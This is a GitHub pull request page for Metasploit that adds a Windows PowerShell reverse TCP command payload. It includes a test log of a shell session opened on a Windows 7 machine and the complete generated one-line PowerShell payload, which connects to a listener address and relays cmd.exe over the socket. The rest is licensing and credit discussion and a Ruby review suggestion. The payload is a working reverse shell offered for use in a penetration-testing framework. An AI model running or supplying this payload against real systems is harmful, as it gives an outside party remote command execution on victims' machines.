
Windows CMD Powershell Reverse TCP #2959

Merged (4 commits, Feb 19, 2014)

Conversation

Meatballs1 (Contributor)

Windows deserves some decent CMD payloads too.

Looks like I based this on: https://github.com/trustedsec/social-engineer-toolkit/blob/master/src/powershell/reverse.powershell by way of a random pastebin from google :)

We can use #2964 to reduce badchars :)

Meatballs1 mentioned this pull request Feb 10, 2014

@jvazquez-r7 (Contributor)

Ping @trustedsec, in order to give him the opportunity to review/discuss in the PR, since it looks like this code is based on code available in his repository.

On the other hand, looking at https://github.com/trustedsec/social-engineer-toolkit/blob/master/readme/LICENSE, it looks like we should update our LICENSE file. Not a big deal, we'll do it ourselves at landing time; just writing it down so we don't forget!

@jvazquez-r7 (Contributor)

Tested on Windows 7 successfully:

msf exploit(handler) > exploit

[*] Started reverse handler on 192.168.172.1:4444 
[*] Starting the payload handler...
[*] Command shell session 2 opened (192.168.172.1:4444 -> 192.168.172.139:49180) at 2014-02-19 14:27:38 -0600

Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\Users\Juan Vazquez>id

C:\Users\Juan Vazquez>whoamid

C:\Users\Juan Vazquez>whoami
dir
win-rnj7nbrk9l7\juan vazquez

C:\Users\Juan Vazquez> Volume in drive C has no label.
 Volume Serial Number is F482-003D

 Directory of C:\Users\Juan Vazquez

02/10/2014  08:21 PM    <DIR>          .
02/10/2014  08:21 PM    <DIR>          ..
02/10/2014  08:21 PM               812 .recently-used.xbel
06/19/2012  04:09 PM    <DIR>          Contacts
02/10/2014  07:33 PM    <DIR>          Desktop
12/13/2013  06:59 PM    <DIR>          Documents
02/10/2014  08:23 PM    <DIR>          Downloads
06/19/2012  04:09 PM    <DIR>          Favorites
06/19/2012  04:09 PM    <DIR>          Links
06/19/2012  04:09 PM    <DIR>          Music
06/19/2012  04:09 PM    <DIR>          Pictures
06/19/2012  04:09 PM    <DIR>          Saved Games
06/19/2012  04:09 PM    <DIR>          Searches
06/19/2012  04:09 PM    <DIR>          Videos
               1 File(s)            812 bytes
              13 Dir(s)  46,790,037,504 bytes free

C:\Users\Juan Vazquez>exit



[*] 192.168.172.139 - Command shell session 2 closed.  Reason: Died from Errno::ECONNRESET

msf exploit(handler) > Interrupt: use the 'exit' co

Payload generated with:

$ ./msfpayload cmd/windows/reverse_powershell LHOST=192.168.172.1 R 
powershell -w hidden -nop -c function RSC{if ($c.Connected -eq $true) {$c.Close()};if ($p.ExitCode -ne $null) {$p.Close()};exit;};$a='192.168.172.1';$p='4444';$c=New-Object system.net.sockets.tcpclient;$c.connect($a,$p);$s=$c.GetStream();$nb=New-Object System.Byte[] $c.ReceiveBufferSize;$p=New-Object System.Diagnostics.Process;$p.StartInfo.FileName='cmd.exe';$p.StartInfo.RedirectStandardInput=1;$p.StartInfo.RedirectStandardOutput=1;$p.StartInfo.UseShellExecute=0;$p.Start();$is=$p.StandardInput;$os=$p.StandardOutput;Start-Sleep 1;$e=new-object System.Text.AsciiEncoding;while($os.Peek() -ne -1){$o += $e.GetString($os.Read())};$s.Write($e.GetBytes($o),0,$o.Length);$o=$null;$d=$false;$t=0;while (-not $d) {if ($c.Connected -ne $true) {RSC};$pos=0;$i=1; while (($i -gt 0) -and ($pos -lt $nb.Length)) {$r=$s.Read($nb,$pos,$nb.Length - $pos);$pos+=$r;if ($pos -and ($nb[0..$($pos-1)] -contains 10)) {break}};if ($pos -gt 0){$str=$e.GetString($nb,0,$pos);$is.write($str);start-sleep 1;if ($p.ExitCode -ne $null){RSC}else{$o=$e.GetString($os.Read());while($os.Peek() -ne -1){$o += $e.GetString($os.Read());if ($o -eq $str) {$o=''}};$s.Write($e.GetBytes($o),0,$o.length);$o=$null;$str=$null}}else{RSC}};

@jvazquez-r7 jvazquez-r7 merged commit 9f04e00 into rapid7:master Feb 19, 2014
@wchen-r7 (Contributor)

@jvazquez-r7 Did you include the license somewhere? If you did, it might be the wrong place, because I'm not seeing it in the LICENSE file.

@Meatballs1 (Contributor, Author)

So the @trustedsec license has:
'feel free to modify, use, change, market, do whatever you want with it as long as you give the appropriate credit where credit is due (which means giving the authors the credit they deserve for writing it).'

And so Dave Kennedy is included as one of the module authors which to me satisfies the license terms? :)

@trustedsec

You guys can use it for whatever you want, don't worry about the credit in MSF =) Take this as my verbal permission to use it for whatever you want inside Metasploit!

@jvazquez-r7 (Contributor)

@wchen-r7 @Meatballs1 @trustedsec see final landing here: aa07065

  • Dave is credited as original shellcode author.
  • Even though the module is licensed as MSF_LICENSE, there is a comment just above the license that clarifies that the PowerShell code is from SET, copyrighted by TrustedSEC, LLC, and BSD licensed (with a link to the original license).

More clarifications to be sure there are no issues :) :

  • @wchen-r7 the licensing thing was discussed and agreed with @todb-r7 before landing.
  • @trustedsec if you think or feel like we're forgetting something about crediting/licensing, please let us know and we'll fix, of course!
  • @trustedsec @Meatballs1 great work with the payload! Thanks for allowing it to be available on MSF :)

@Meatballs1 (Contributor, Author)

Much hugs and kisses ;)

@trustedsec

Hugs and kisses all the way =) Thanks for putting this together it rocks and I'll definitely be using it =)

def command_string
  lhost = datastore['LHOST']
  lport = datastore['LPORT']
  powershell = "function RSC{"\
Contributor

Maybe a heredoc with per-line strip would make this a little more readable:

powershell = <<-EOS.lines.map(&:strip).join
  function RSC{
  …
  }else{RSC}};
EOS
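The heredoc-and-strip construction suggested above, as an added example in Ruby (not code from the PR): it builds the one-line string from the page's own RSC fragment and also flags the failure mode of that join, a line that ends mid-token and that `strip` plus `join` would fuse with the next line. The helper names `one_line` and `unsafe_lines` and the end-of-line boundary rule are assumptions of this example.

```ruby
# Added example, not code from the PR: build a one-line command string from
# a readable heredoc (the reviewer's suggestion) and check the join is safe.

# Collapse a multi-line heredoc into one line: strip indentation and
# newlines, drop blank lines, join with nothing in between.
def one_line(script)
  script.lines.map(&:strip).reject(&:empty?).join
end

# Joining stripped lines drops the newline AND the indentation, so a line
# that ends in the middle of a statement silently merges with the next one
# ("new-object" + "System..." becomes "new-objectSystem..."). Assumed rule
# for this example: every line must end at a PowerShell statement or block
# boundary (';', '{', '}' or ')'). Returns the lines that break the rule.
def unsafe_lines(script)
  script.lines.map(&:strip).reject(&:empty?)
        .reject { |l| l.end_with?(';', '{', '}', ')') }
end

# The RSC cleanup function exactly as it appears in the page's payload,
# written out one statement per line.
RSC = <<-EOS
  function RSC{
    if ($c.Connected -eq $true) {$c.Close()};
    if ($p.ExitCode -ne $null) {$p.Close()};
    exit;
  };
EOS

# Constructed counter-example: a statement wrapped across two lines.
BAD = <<-EOS
  $e=new-object
    System.Text.AsciiEncoding;
EOS

if __FILE__ == $0
  puts one_line(RSC)
  puts "unsafe: #{unsafe_lines(BAD).inspect}"
end
```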
